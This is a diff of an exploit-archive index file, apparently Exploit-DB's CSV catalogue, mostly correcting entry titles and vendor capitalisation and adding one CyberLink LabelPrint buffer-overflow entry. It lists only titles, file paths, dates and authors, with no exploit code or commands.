-22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Potential Information Disclosure",2003-06-20,IhaQueR,linux,local,0
+22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure",2003-06-20,IhaQueR,linux,local,0
 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,linux,local,0
 40409,platforms/windows/local/40409.txt,"Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",windows,local,0
 22835,platforms/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - 'fgets()' Local Buffer Overrun",2003-06-24,posidron,windows,local,0
@@ -8491,7 +8491,7 @@ id,file,description,date,author,platform,type,port
 31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
 31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0
 31347,platforms/lin_x86-64/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86-64,local,0
-31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' File Buffer Overflow (SEH) (ASLR + DEP Bypass)",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
+31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) (ASLR + DEP Bypass)",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
 31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0
 31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
 31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local,0
@@ -8989,7 +8989,7 @@ id,file,description,date,author,platform,type,port
 40323,platforms/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local,0
 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
 40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0
-40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,windows,local,0
+40442,platforms/windows/local/40442.txt,"NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,windows,local,0
 40443,platforms/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,windows,local,0
 40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
 40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
@@ -9253,6 +9253,7 @@ id,file,description,date,author,platform,type,port
 42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-12,mr_me,windows,local,0
 42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
 42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0
+42777,platforms/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -9543,7 +9544,7 @@ id,file,description,date,author,platform,type,port
 868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0
 875,platforms/windows/remote/875.c,"Sentinel LM 7.x - UDP License Service Remote Buffer Overflow",2005-03-13,class101,windows,remote,5093
 878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0
-879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit",2005-03-14,lammat,multiple,remote,0
+879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Remote Exploit",2005-03-14,lammat,multiple,remote,0
 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380
 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25
 902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21
@@ -9556,7 +9557,7 @@ id,file,description,date,author,platform,type,port
 940,platforms/linux/remote/940.c,"Sumus 0.2.2 - httpd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81
 943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution",2005-04-18,"Michael Krax",windows,remote,0
 944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0
-945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - GET Request Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,80
+945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - GET Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,80
 947,platforms/windows/remote/947.pl,"Microsoft Exchange Server - Remote Code Execution (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25
 949,platforms/windows/remote/949.c,"PMSoftware Simple Web Server 1.0 - Remote Stack Overflow",2005-04-20,c0d3r,windows,remote,80
 952,platforms/windows/remote/952.pl,"MailEnable Enterprise & Professional - https Remote Buffer Overflow",2005-04-25,CorryL,windows,remote,8080
@@ -9706,7 +9707,7 @@ id,file,description,date,author,platform,type,port
 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300
 1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)",2006-04-15,Metasploit,windows,remote,8080
 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x - Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004
-1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0
+1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - GET Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0
 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - 'parse_xml.cgi' Code Execution",2003-02-24,FOX_MULDER,osx,remote,0
 1741,platforms/linux/remote/1741.c,"MySQL 5.0.20 - COM_TABLE_DUMP Memory Leak/Remote Buffer Overflow",2006-05-02,"Stefano Di Paola",linux,remote,3306
 1742,platforms/linux/remote/1742.c,"MySQL 4.1.18/5.0.20 - Local/Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0
@@ -9936,9 +9937,9 @@ id,file,description,date,author,platform,type,port
 3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0
 3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled - ActiveX Buffer Overflow",2007-05-10,Jambalaya,windows,remote,0
 3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0
-3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Request Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080
+3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080
 3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow",2007-05-13,rgod,windows,remote,0
-3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (exec-shield) GET Request Remote Code Execution",2007-05-14,Xpl017Elz,linux,remote,8080
+3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (exec-shield) GET Remote Code Execution",2007-05-14,Xpl017Elz,linux,remote,8080
 3925,platforms/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow",2007-05-14,"Thomas Pollet",windows,remote,113
 3927,platforms/windows/remote/3927.html,"DeWizardX - 'DEWizardAX.ocx' Arbitrary File Overwrite",2007-05-15,shinnai,windows,remote,0
 3934,platforms/windows/remote/3934.py,"Eudora 7.1 - SMTP ResponseRemote Remote Buffer Overflow",2007-05-15,h07,windows,remote,0
@@ -10018,7 +10019,7 @@ id,file,description,date,author,platform,type,port
 4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 - 'VDT70.dll NotSafe' Stack Overflow",2007-08-06,DeltahackingTEAM,windows,remote,0
 4266,platforms/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning Exploit",2007-08-07,posedge,multiple,remote,0
 4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - (SourceUrl) ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0
-4280,platforms/windows/remote/4280.pl,"Savant Web Server 3.1 - GET Request Remote Overflow (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80
+4280,platforms/windows/remote/4280.pl,"Savant Web Server 3.1 - GET Remote Overflow (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80
 4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow",2007-08-13,n00b,windows,remote,26000
 4287,platforms/windows/remote/4287.py,"Surgemail 38k - 'Search' Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143
 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0
@@ -10127,7 +10128,7 @@ id,file,description,date,author,platform,type,port
 4923,platforms/windows/remote/4923.txt,"Miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0
 4932,platforms/windows/remote/4932.html,"Digital Data Communications - 'RtspVaPgCtrl' Class Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0
 4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)",2008-01-18,"Marcin Kozlowski",windows,remote,0
-4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0
+4941,platforms/hardware/remote/4941.txt,"Belkin F5D9230-4 Wireless G Plus MIMO Router - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0
 4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - 'MeIpCamX.dll 1.0.0.4' Remote Buffer Overflow",2008-01-20,rgod,windows,remote,0
 4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String",2008-01-21,hempel,linux,remote,0
 4948,platforms/windows/remote/4948.txt,"Microsoft Windows RSH daemon 1.8 - Remote Buffer Overflow",2008-01-21,prdelka,windows,remote,0
@@ -10344,7 +10345,7 @@ id,file,description,date,author,platform,type,port
 7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute",2009-01-01,JJunior,windows,remote,0
 7701,platforms/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow",2009-01-08,zuc,linux,remote,445
 7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,windows,remote,0
-7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0
+7712,platforms/hardware/remote/7712.txt,"NETGEAR WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0
 7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0
 7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
 7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
@@ -10423,10 +10424,10 @@ id,file,description,date,author,platform,type,port
 8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0
 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0
 8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID - Remote Overflow",2009-04-01,"Guido Landi",windows,remote,0
-8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Windows) - GET Request Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80
+8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Windows) - GET Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80
 8339,platforms/windows/remote/8339.py,"XBMC 8.10 - (takescreenshot) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80
 8340,platforms/windows/remote/8340.py,"XBMC 8.10 - (get tag from file name) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80
-8354,platforms/windows/remote/8354.py,"XBMC 8.10 - GET Request Remote Buffer Overflow (SEH) (Universal)",2009-04-06,n00b,windows,remote,80
+8354,platforms/windows/remote/8354.py,"XBMC 8.10 - GET Remote Buffer Overflow (SEH) (Universal)",2009-04-06,n00b,windows,remote,80
 8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router - WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0
 8363,platforms/windows/remote/8363.py,"XBMC 8.10 - (HEAD) Remote Buffer Overflow (SEH)",2009-04-07,His0k4,windows,remote,80
 8368,platforms/windows/remote/8368.txt,"peterConnects Web Server - Traversal Arbitrary File Access",2009-04-08,"Bugs NotHugs",windows,remote,0
@@ -10516,7 +10517,7 @@ id,file,description,date,author,platform,type,port
 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,hardware,remote,0
 9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,windows,remote,69
 9473,platforms/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,hardware,remote,0
-9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",hardware,remote,0
+9498,platforms/hardware/remote/9498.txt,"NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",hardware,remote,0
 9500,platforms/windows/remote/9500.cpp,"NaviCOPA Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,windows,remote,0
 9503,platforms/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote,0
 9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 - (welcome message) Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,windows,remote,0
@@ -10529,7 +10530,7 @@ id,file,description,date,author,platform,type,port
 9615,platforms/windows/remote/9615.jar,"Pidgin MSN 2.5.8 - Remote Code Execution",2009-09-09,"Pierre Nogues",windows,remote,0
 9638,platforms/windows/remote/9638.txt,"Kolibri+ Web Server 2 - Source Code Disclosure",2009-09-11,SkuLL-HackeR,windows,remote,0
 9643,platforms/windows/remote/9643.txt,"kolibri+ Web Server 2 - Directory Traversal",2009-09-11,"Usman Saeed",windows,remote,0
-9644,platforms/windows/remote/9644.py,"Kolibri+ Web Server 2 - GET Request Remote Overwrite (SEH)",2009-09-11,blake,windows,remote,80
+9644,platforms/windows/remote/9644.py,"Kolibri+ Web Server 2 - GET Remote Overwrite (SEH)",2009-09-11,blake,windows,remote,80
 9649,platforms/windows/remote/9649.txt,"Xerver HTTP Server 4.32 - Arbitrary Source Code Disclosure",2009-09-11,Dr_IDE,windows,remote,0
 9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote,0
 9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 - Multiplatform Remote Code Execution via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0
@@ -10538,9 +10539,9 @@ id,file,description,date,author,platform,type,port
 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure",2009-09-14,"ThE g0bL!N",windows,remote,0
 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143
 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0
-9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH)",2009-09-15,blake,windows,remote,6660
+9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)",2009-09-15,blake,windows,remote,6660
 9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0
-9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Universal Remote Buffer Overflow (SEH)",2009-09-15,hack4love,windows,remote,6660
+9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)",2009-09-15,hack4love,windows,remote,6660
 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0
 9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow",2009-09-17,"Sebastian Wolfgarten",windows,remote,0
 9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow",2009-09-17,bmgsec,windows,remote,0
@@ -10634,7 +10635,7 @@ id,file,description,date,author,platform,type,port
 10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (modem based) (Metasploit)",2001-12-12,I)ruid,solaris,remote,0
 10037,platforms/cgi/remote/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow (Metasploit)",2004-08-19,skape,cgi,remote,0
 10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80
-10053,platforms/windows/remote/10053.txt,"httpdx 1.4 - GET Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80
+10053,platforms/windows/remote/10053.txt,"httpdx 1.4 - GET Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80
 10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0
 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - Cross-Site Scripting",2009-07-04,sh2kerr,hardware,remote,80
 10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 - 'imgsrv.exe' Buffer Overflow",2009-10-07,blake,windows,remote,1235
@@ -11063,7 +11064,7 @@ id,file,description,date,author,platform,type,port
 16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
 16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16388,platforms/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
+16388,platforms/hardware/remote/16388.rb,"NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code - Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
@@ -11289,7 +11290,7 @@ id,file,description,date,author,platform,type,port
 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-11-05,Metasploit,windows,remote,0
 16690,platforms/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80
 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80
-16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128
+16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128
 16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 (Windows) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7787
 16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 Beta 5 - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,26000
 16695,platforms/windows/remote/16695.rb,"Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,12203
@@ -11449,7 +11450,7 @@ id,file,description,date,author,platform,type,port
 16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
 16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
 16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote,0
-16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
+16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
 16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
 16859,platforms/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
 16860,platforms/lin_x86/remote/16860.rb,"Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,lin_x86,remote,0
@@ -11765,7 +11766,7 @@ id,file,description,date,author,platform,type,port
 18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 - SVG Browser Java Code Execution (Metasploit)",2012-05-19,Metasploit,multiple,remote,0
 18893,platforms/hardware/remote/18893.py,"HP VSA - Remote Command Execution",2012-02-17,"Nicolas Gregoire",hardware,remote,0
 18898,platforms/php/remote/18898.rb,"Active Collab 'chat module' < 2.3.8 - Remote PHP Code Injection (Metasploit)",2012-05-19,Metasploit,php,remote,0
-18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector - POST Request Buffer Overflow (Metasploit)",2012-05-19,Metasploit,windows,remote,0
+18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector - POST Buffer Overflow (Metasploit)",2012-05-19,Metasploit,windows,remote,0
 18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)",2012-05-21,Metasploit,hardware,remote,0
 18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager - lmgrd Buffer Overflow (Metasploit)",2012-05-23,Metasploit,windows,remote,0
 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 - Log Entry 'sprintf()' Buffer Overflow (Metasploit)",2012-05-25,Metasploit,windows,remote,0
@@ -11781,7 +11782,7 @@ id,file,description,date,author,platform,type,port
 19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit)",2012-06-08,Metasploit,windows,remote,0
 19002,platforms/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution (Metasploit)",2012-06-06,Metasploit,windows,remote,0
 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution (Metasploit)",2012-06-10,Metasploit,windows,remote,0
-19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug exploit",1988-08-01,anonymous,linux,remote,0
+19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug Exploit",1988-08-01,anonymous,linux,remote,0
 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
 19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0
 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0
@@ -11993,7 +11994,7 @@ id,file,description,date,author,platform,type,port
 19722,platforms/unix/remote/19722.txt,"RedHat 6.1 / IRIX 6.5.18 - lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0
 19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99b 1.1.1.1/3.19 - Remote Buffer Overflow",2000-01-12,"Drew Copley",windows,remote,0
 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Buffer Overflow",2000-01-10,Zhodiac,linux,remote,0
-19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 - WebMail Long GET Request",2000-01-17,"Greg Hoglund",windows,remote,0
+19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 - WebMail GET Exploit",2000-01-17,"Greg Hoglund",windows,remote,0
 19731,platforms/windows/remote/19731.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0
 19732,platforms/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script - Tag Checking Bypass",2000-01-29,"Arne Vidstrom",multiple,remote,0
 19734,platforms/windows/remote/19734.java,"Microsoft Virtual Machine 2000 - Series/3000 Series getSystemResource",2000-01-31,"Hiromitsu Takagi",windows,remote,0
@@ -12894,8 +12895,8 @@ id,file,description,date,author,platform,type,port
 22000,platforms/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 - Admin Interface Cross-Site Scripting",2002-11-08,euronymous,cgi,remote,0
 22001,platforms/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File Disclosure",2002-11-08,"Tamer Sahin",windows,remote,0
 22007,platforms/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote,0
